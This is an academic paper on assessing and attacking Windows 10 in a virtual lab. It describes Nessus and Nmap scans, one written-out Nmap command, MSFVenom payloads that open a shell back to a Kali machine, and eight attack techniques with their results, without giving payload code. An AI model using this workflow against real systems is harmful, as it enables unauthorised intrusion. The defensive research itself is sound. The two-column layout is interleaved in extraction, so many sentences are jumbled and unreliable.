21st International Symposium INFOTEH-JAHORINA, 16-18 March 2022

Windows 10 Operating System:

Vulnerability Assessment and Exploitation

Jasmin Softić, Zanin Vejzović

Faculty of Computer Science
Sarajevo School of Science and Technology
71000 Sarajevo, Bosnia and Herzegovina
[email protected] / [email protected]

Abstract— The study focused on assessing and testing Windows mfsvenum, Metasploit framework, Nmap, and Netcat to exploit
10 to identify possible vulnerabilities and their ability to the system’s vulnerabilities.
withstand cyber-attacks. CVE data, alongside other vulnerability
2022 21st International Symposium INFOTEH-JAHORINA (INFOTEH) | 978-1-6654-3778-3/22/$31.00 ©2022 IEEE | DOI: 10.1109/INFOTEH53737.2022.9751274

reports, were instrumental in measuring the operating system’s

performance. Metasploit and Nmap were essential in penetration
II. WINDOWS 10 AND SECURITY ASSESSMENT
and intrusion experiments in a simulated environment. The study There are numerous computer OSs, but only four centrally
applied the following testing procedure: information gathering, exist in the mainstream – Microsoft Windows, Mac OS X,
scanning and results analysis, vulnerability selection, launch Linux, and Unix. Windows 10 was released on July 29, 2015,
attacks, and gaining access to the operating system. Penetration and Microsoft claims it was installed on more than 110 million
testing involved eight attacks, two of which were effective against devices three months later. [1]. Today, 1.3 billion users use
the different Windows 10 versions. Installing the latest version of Windows 10 [2], representing 79.84% of the OS market share
Windows 10 did not guarantee complete protection against worldwide [3], making it the world’s most popular desktop OS.
attacks. Further research is essential in assessing the system’s
vulnerabilities are recommending better solutions. Windows 10 is built on Windows NT technology, allowing
users to easily interact with the OS within the enterprise and
Keywords: Windows 10, Vulnerability Assessment, Vulnerability, personal computing environments. The system leverages an
cyber-attack. incremental development approach achieved from the updates
of previous versions like Windows 8.1 [1]. The incremental
I. INTRODUCTION approach enables Microsoft to quickly resolve security issues
and performance constraints identified in the earlier versions of
Malicious software intends to create harm to computer
the software. Also, it allows users to update their desktop OSs
systems or people. However, a developer can use malicious
with minimal compatibility setbacks easily.
software to test system vulnerability during penetration testing
– a form of ethical hacking – as part of the operating system The prevalence of Windows 10 among organizations and
(OS) patching procedure. Anti-viruses are an essential line of personal users makes it susceptible to increasing cyber-attacks.
defense against harmful actors and programs, and standard OSs Any user is vulnerable to cyber security threats, necessitating
like Windows 10 have them pre-installed. preventive measures through a vulnerability assessment.
Attackers often breach systems remotely or use malicious
Over the years, Microsoft has improved Windows 10 by
software to exploit flaws. Evaluating possible OS attack
introducing more features. The extra features encourage
vectors includes testing bugs and examining vulnerability
hackers to look for vulnerabilities. Software engineers
vectors [4]. Defenders must develop and deploy software
constantly secure systems and Windows 10 developers are part
patches following software release and progressively facilitate
of the solution. The underlying challenge is creating an
system updates to address the emerging cyber security threats.
excellent user experience while securing the OS
simultaneously. Regular vulnerability assessment is one of the A review of vulnerabilities in CVE Details – the ultimate
techniques to deter invader activity. Vulnerability and system security vulnerability data source – provided essential
penetration testing are practical assessment methods for information for assessing Windows 10 performance against
eliminating bugs and security loopholes. specific vulnerabilities. The repository’s significance involved
its consistency and accuracy in exposure updates, allowing
The purpose of this research was to uncover weak areas in
researchers to grasp emerging concerns across platforms better.
newly installed Windows 10 utilizing both paid and free, open-
A review of vulnerability reports from Windows 7, Windows
source tools to understand probable attack scenarios better.
8, Windows 8.1, and Windows 10 from [5], [6], [7], and [8] led
Another goal was to show that default protection and settings
to significant vulnerability insight.
cannot fully protect against cyber-attacks. This study examined
various versions of Windows 10 and Kali Linux tools like

978-1-6654-3778-3/22/$31.00 ©2022 IEEE

Authorized licensed use limited to: Universitas Indonesia. Downloaded on December 06,2023 at 04:35:48 UTC from IEEE Xplore. Restrictions apply.
 Windows 7 had 1924 vulnerabilities [5], Windows 8 had techniques for attacking windows after mapping with MITRE
252 [6], Windows 8.1 had 1719 flaws [7], and Windows 10 ATT&CK were as follows:
had 2394 security issues [8] (see Figure 1).
• T1059 – Command, and Scripting Interpreter 24 %
• T1218 – Signed Binary Process Execution 19%
• T1543 – Crete and Modify System process 16 %
• T1053 – Schedule Task / Job 16%
• T1003 – OS Credential Dumping 7%
• T1005 Process Injection 7%
• T1027 Obfuscated Files or Information 6%
• T1105 Ingress Tool Transfer 5%
• T1569 System Services 4%
Figure 1. Vulnerabilities in Windows OSs Another study involving a classification framework for
distinct cyber-attacks occurrence patterns found that three of
Evaluating Windows 10 security issues based on threat type the top seven cyber-attacks are linked to Microsoft Windows
sought to group them based on the nature of the attack. The (RDP, WinEXE, WinDLL) [12].
evaluation was instrumental in providing a deeper From 2007 to 2018, researchers focused on Microsoft
understanding of security measures needed to remediate the Windows malware by observing malware families. Aidan et al.
vulnerabilities (see Figure 2). [13] conducted a ransom ware assault survey, citing the
following malware as the most dangerous: Crypto Wall, CTB
Locker, Locky, Wanna Cry (125 000 organizations in 150
countries affected), and 2017 Petya (64 countries affected), all
of which target Windows users. Regular patching of Microsoft
Windows could prevent attacks that affected millions of
machines globally. Even with a strong firewall, a Windows OS
can hardly detect and stop various cyber-attacks, such as
Denial of Service attacks (DoS) [14].
The introduction of a new Windows Defender Centre in
Windows 10 was instrumental in improving the system’s
security by detecting security threats through event log
optimization [15]. Windows Defender Centre gives users
control and visibility of device security through five pillars:
Figure 2. Grouping of Windows 10 vulnerabilities virus and threat protection, device performance and health,
firewall and network protection, app and browser control, and
family options. Dodge et al. [16] used live virtual machine
III. RELATED WORKS introspection to simulate a Windows-based cyber-attack. Based
on the simulation, Windows-specific data structures enable this
There is limited research on Windows 10 vulnerability and type of assault by bringing essential information from a
security assessment. Microsoft Windows is vulnerable to Windows memory dump utilizing forensic analysis tools.
various remote and local attacks [9]. Most attacks involve
website access, sending an email, logging in, downloading Adversaries can infiltrate an organization’s network by
malicious files, and altering registry keys. Essentially, most exploiting vulnerabilities in Windows OS. Razaque et al. [17]
users encounter and grant malicious software access into their published a report on medical cyber security attacks,
systems without even knowing. expressing concern about Windows OS vulnerabilities that
pose a security risk to medical institutions. The threats include
A cyber-attack is a malicious code or practice meant to the WannCry ransom ware vulnerability or the presence of a
change, exploit, deny, or destroy valuable data and information server message block vulnerability that allows an attacker to
in computers and networks [10]. An excellent instance of launch the EthernalBule attack. Many companies, such as
malware is Flame – a Microsoft Windows malware used to Tenable, offer automated vulnerability assessment solutions to
assault Middle Eastern countries in 2012. Another malware is help organizations test their environments for flaws. Also,
the Duqu malware which also targets Microsoft Windows OS Harrell et al. [18] examined the vulnerability of a high
by exploiting a hole in the Wind32k.sys component of education institution using Nessus and Burp scanners. The
Windows. assessment revealed that Windows OS had critical flaws,
The Red Canary [11] reported that out of 20 000 confirmed making it susceptible to cyber-attacks.
threats across their customers’ environment, the most frequent

Authorized licensed use limited to: Universitas Indonesia. Downloaded on December 06,2023 at 04:35:48 UTC from IEEE Xplore. Restrictions apply.
 IV. EXPERIMENTAL SETUP AND ANALYSIS VMWare Workstation Pro 15.5 helped set up a virtual
environment to analyze Windows 10 for vulnerabilities,
A. Proposed Method resulting in five virtual machines (see Table 2). No third-party
Investigating different scenarios and attack types is a software, updates, and patching were applicable in installing
necessary initial step in defending Windows 10 against cyber- the OS on VMs 2, 3, and 4.
attacks. The general attack process used in this research is Kali Linux 2021.3 was the attacker on VM 1, while VM 5
shown in Figure 3. configuration involved Nessus Professional Version 8.15.2
with the latest upgrade for Nessus plugins performed on
October 21, 2021. Network configuration used a host-only
network.
Table 2. Lab setup details

# VM OS Version IP Address
Name
Figure 3. Attack process
1 Kali Linux 2021.3 192.168.1.104
Linux
The steps in Figure 3 are described below:
2 Windows Windows 20H2 92.168.1.100
• Information Gathering – Information gathering 10 E – 10 19042.1237
precedes any assault. Data collection includes passive SSST – Education
data, such as publicly available information on the
L1
target.
3 Windows Windows 20H2 192.168.1.101
• Scanning & Result Analysis – Vulnerability analysis 10 – Pro – 10 Pro 19042.1237
starts at this phase. Nessus Pro and Nmap were
SSST-L2
instrumental in assessing how a target reacts to
incursions. 4 Windows Windows 20H2 92.168.1.102
10 ENT – 10 19042.1237
• Vulnerability Selection – This phase is integral in
SSST-L3 Enterprise
identifying easily exploited vulnerabilities against the
target. Nessus Pro classified vulnerabilities as High, 5 Windows Windows 20H2 192.168.1.103
Medium, Normal, Low, or Info using CVSS v3.0. 10 - 10 Pro 19042.1237
Nessus
• Launching Attack – Metasploit – MSFVenom, which
combines the msfpayload and msfencode tools into a
single framework – was instrumental in generating
malicious files injected and executed on Windows 10
machines. The attacker established a shell connection
to the attacker Kali Linux machine.
• Gaining Access – Following a successful assault, the
attacker used various tools to analyze the system,
obtaining desirable outcomes.

B. Lab Setup and Analysis

The workstation used for the experimental part is HP Z8
Workstation with Windows 10 Pro, provided in Table 1.
Table 1. Workstation Details

Device Specifications
CPU Intel(R) Silver 4210 CPU @
2.20 GHz
RAM 32 GB
System Type 64 – bit OS, x64-based Figure 4. Lab Setup for Testing Environment
processor
Graphics Card NVIDIA Quadro P1000

Authorized licensed use limited to: Universitas Indonesia. Downloaded on December 06,2023 at 04:35:48 UTC from IEEE Xplore. Restrictions apply.
C. Vulnerability Assessment that Windows 10 has a relatively reliable defense mechanism.
Each Windows system was scanned with Nessus Of the eight malicious command attacks, only the Batch File
professional scanner with following parameters: 1st Scan: non- attack and PowerShell attack were compromised in two
credential scan, IP range 192.168.1.100-102. systems, as depicted in Table 3.

2nd Scan – Credential Scan, IP range 192.168.1.100-102. Table 3. Attack simulation results
Non-Credentials scan results per each machine by utilizing
latest updated from CVSS v3.0 (see Figure 6). Technique Windows 10 Windows 10 Windows 10
Name Education Pro (L2) Enterprise (L3)
(L1)
Batch File compromised not compromised
compromised
Figure 5. Non-Credential Nessus scan result Mshta not not not
compromised compromised compromised
Credential scan results as shown in Figure 7:
Powercat compromised not compromised
compromised
Rundll32 not not not
Figure 6. Credential Nessus Scan results compromised compromised compromised
Regsvr32 not not not
With the Nessus scanner, neither high nor critical compromised compromised compromised
vulnerabilities were unidentifiable. There was 1 Medium
related to SMB signing and 37 informative. Cscript not not not
compromised compromised compromised
Then, a port scan using Nmap on Linux with parameters
nmap -sV 192.168.1.100-102 was run (see Figure 7). Msiexec not not not
compromised compromised compromised
Wmic not not not
compromised compromised compromised

Most attacks are caused by a user’s lack of security

knowledge. This study assumed the worst-case scenario where
the user switched off the firewall and antivirus. Tests on
different versions of Windows 10 found that two of the eight
attacks were effective. Not all versions of windows are
susceptible to all cyber-attacks.

VI. CONCLUSION
Freely available technologies are essential to discovering
flaws in Windows 10, implying that systems are vulnerable to
Figure 7. Nmap Scan Result unauthorized exploitation by third parties. Limitations in user
security awareness and vulnerabilities in the OS and other
Nmap scan utilized vulscan script, which contains CVE software are the primary causes of system compromise.
databases to host on our Kali Linux Machine. The script According to [19] by comparing Windows, Ubuntu, RedHat,
includes the following databases: scipvuldb.csv, cve.csv, Novel, MacOS and Solaris vulnerabilities severity , the most
securityfocus.csv, xforce.csv, expliotdb.csv, openvas.csv, severe vulnerabilities have been discovered in Windows OS.
securitytracker.csv, osvdb.csv. The second Nmap scan with A future study should explore different attack approaches
vulscan script results found no relationship to CVE from well- using various tools. Finally, the study will create a program
known databases. that can automatically detect attacks and recommend the best
mitigation and prevention practices.
V. RESULTS AND DISCUSSION
Turning off the firewall and anti-virus and avoiding third- VII. REFERENCES
party software without patching showed that each version of [1] E. Bott, “Introducing Windows 10 for IT Professionals,” Microsoft
Windows 10 does not have OS-level vulnerabilities. Press, 2016.
[2] Microsoft, “Story Labs,” Monday,18 October 2021. [Online]. Available:
Running specially crafted malicious files on different https://news.microsoft.com/bythenumbers/en/windowsdevices.
Windows 10 machines involving eight simulations depicted

Authorized licensed use limited to: Universitas Indonesia. Downloaded on December 06,2023 at 04:35:48 UTC from IEEE Xplore. Restrictions apply.
[3] StatCounter, "GlobalStats," September 2021. [Online]. Available: [13] J. S. Aidan, H. K. Verma and L. K. Awasthi, “Comprehensive Survey on
https://gs.statcounter.com/os-version-market- Petya Ransomware Attack,” in 2017 International Conference on Next
share/windows/desktop/worldwide. Generation Computing and Information Systems (ICNGCIS), 2017.
[4] Ö. ASLAN and R. SAMET, “Mitigating Cyber Security Attacks by [14] N. Naik, P. Jenkins, R. Cooke, D. Ball, A. Foster and Y. Jin,
being Aware of Vulnerabilities and Bugs,” in 2017 International “Augmented windows fuzzy firewall for preventing denial of service
Conference on Cyberworlds, 2017. attack,” in 2017 IEEE International Conference on Fuzzy Systems
[5] CVE Details - Windows 7, "Vulnerability Statistics," 2021. [Online]. (FUZZ-IEEE), 2017.
Available: https://www.cvedetails.com/product/17153/Microsoft- [15] J. Baráth, “Optimizing windows 10 logging to detect network security
Windows-7.html?vendor_id=26. [Accessed 14 October 2021]. threats,” in 2017 Communication and Information Technologies (KIT),
[6] CVE Details-Windows 8, "Vulnerability Statistics," 2021. [Online]. Vysoke Tatry,Slovakia, 2017.
Available: https://www.cvedetails.com/product/22318/Microsoft- [16] D. A. Dodge, B. E. Mullins, G. L. Peterson and J. S. Okolica,
Windows-8.html?vendor_id=26. [Accessed 14 October 2021]. “Simulating windows-based cyber attacks using live virtual machine
[7] CVE Details-Windows 8.1, "Vulnerability Statistics," 2021. [Online]. introspection,” in Proceedings of the 2010 Summer Computer
Available: https://www.cvedetails.com/product/26434/Microsoft- Simulation Conference, Ottawa, Ontario, Canada, 2010.
Windows-8.1.html?vendor_id=26. [Accessed 14 October 2021]. [17] A. Razaque, F. Amsaad, M. J. Khan, S. Hariri, S. Chen, C. Siting and X.
[8] CVE Details - Windows 10, "Vulnerability Statistcs," 2021. [Online]. Ji, “Survey: Cybersecurity Vulnerabilities, Attacks and Solutions in the
Available: https://www.cvedetails.com/product/32238/Microsoft- Medical Domain,” IEEE Access, vol. 7, 2019.
Windows-10.html?vendor_id=26. [Accessed 14 October 2021]. [18] C. R. Harrell, M. Patton, H. Chen and S. Samtani, “Vulnerability
[9] K. Dashora, D. S. Tomar and J. Rana, “A Practical Approach for Assessment, Remediation, and Automated Reporting: Case Studies of
Evidence Gathering in Windows,” International Journal of Computer Higher Education Institutions,” in 2018 IEEE International Conference
Applications (0975 – 8887), no. Volume 5 - No.10, August 2010. on Intelligence and Security Informatics (ISI), Miami, FL, USA, 2018.
[10] P. Arora and A. Dhar, “CYBER ATTACKS: OPERATION AND
PREVENTION,” International Journal of Engineering Applied Sciences [19] A. Gorbenko, A. Romanovsky, O. Tarasyuk and O. Biloborodov,
and Technology, vol. 1, no. 12, pp. 93-96, 2016. "Experience Report: Study of Vulnerabilities of Enterprise Operating
[11] Red Canary, “2021 Threat Detection Report,” Red canary, 2021. Systems," in 2017 IEEE 28th International Symposium on Software
Reliability Engineering, 2017.
[12] M. S. K. Awan, M. AlGhamdi, S. AlMotiri, P. Burnap and O. Rana, “A
classification framework for distinct cyber-attacks based on occurrence
patterns,” Sochi, Russia, 2015.

Authorized licensed use limited to: Universitas Indonesia. Downloaded on December 06,2023 at 04:35:48 UTC from IEEE Xplore. Restrictions apply.